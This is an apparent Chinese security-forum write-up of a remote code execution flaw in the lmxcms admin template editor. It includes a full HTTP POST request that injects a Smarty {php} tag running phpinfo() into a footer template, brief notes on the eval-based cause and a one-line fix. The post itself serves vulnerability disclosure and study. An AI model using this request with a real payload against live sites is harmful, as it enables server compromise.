● 漏洞url: http://lmxcmm1.41.com/admin.php?m=Template&a=editfile&dir=default
● 漏洞参数:temcontent
● 是否存在限制:
● 是否还有其他条件:使用smarty模板,m=Template
POST /admin.php?m=Template&a=editfile&dir=default HTTP/1.1
Host: lmxcmm1.41.com
Content-Length: 564
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://lmxcmm1.41.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://lmxcmm1.41.com/admin.php?m=Template&a=editfile&dir=default/footer.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=pu9aa35v02aabukef267n96k74
Connection: close
temcontent=%3Cdiv+class%3D%22footerBox+width%22%3E%0D%0A%09%3Cdiv+class%3D%22footer%22%3E%0D%0A++++++++%3Cp%3E%3C%7Bphp%7D%3Ephpinfo%28%29%3B%3C%7B%2Fphp%7D%3E%E6%88%91%E7%9A%84%E7%BD%91%E7%AB%99+%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89+2014+%E6%B9%98ICP%E5%A4%878888888%3Cbr+%2F%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fwww.lmxcms.com%22%3Elmxcms%3C%2Fa%3E+%3C%7B%24version%7D%3E+%C2%A92014+%3Ca+href%3D%22http%3A%2F%2Fwww.lmxcms.com%22%3Ewww.lmxcms.com%3C%2Fa%3E%3C%2Fp%3E%0D%0A++++%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&filename=footer.html&settemcontent=%E6%8F%90%E4%BA%A4
查看如何编写这个标签
提交后访问前台首页
搜索smarty模板。一般模板功能会出现eval函数的执行,因为有可能在前端页面通过php的代码去实现一些内容。首页、头部、尾页文件html。admin目录下的template文件。
在执行文件写入的时候也不会有限制
通过文件找到对应功能位置,果然是在模板调用时。
打开一个尾部html,发现和页面显示不同。要么是存储的变量,变量等于1.41。或者写道数据库了,通过model层去除1.41然后显示。因为是个html文件,不能执行php代码,所以会引用eval强制执行造成rce
对所有的输入进行严格的验证和清洁,并确保对外部输入的处理安全可控。
更多内容已被隐藏
主题内容你需要付费可见 (点击购买) 售价:1 金币
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-魔方 | 100.00 | 0 | 2024-03-03 15:03:27 | 2月份投稿活动奖励结算 首次投稿一篇有效文章 100 |
Track-魔方 | 600.00 | 0 | 2024-02-04 18:06:54 | 深度 200 普适 200 可读 200 |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
黑影
发表于 10个月前
1
评论列表
加载数据中...
小瑟斯
发表于 10个月前
2
评论列表
加载数据中...
格林
发表于 10个月前
1
评论列表
加载数据中...
叴龙
发表于 10个月前
666
评论列表
加载数据中...
chd611
发表于 10个月前
学习来看看
评论列表
加载数据中...
小枭
发表于 9个月前
1
评论列表
加载数据中...
2461975828
发表于 1个月前
666
评论列表
加载数据中...
admin12
发表于 1个月前
666
评论列表
加载数据中...
gwkxw1nz0zqp
发表于 9天前
1
评论列表
加载数据中...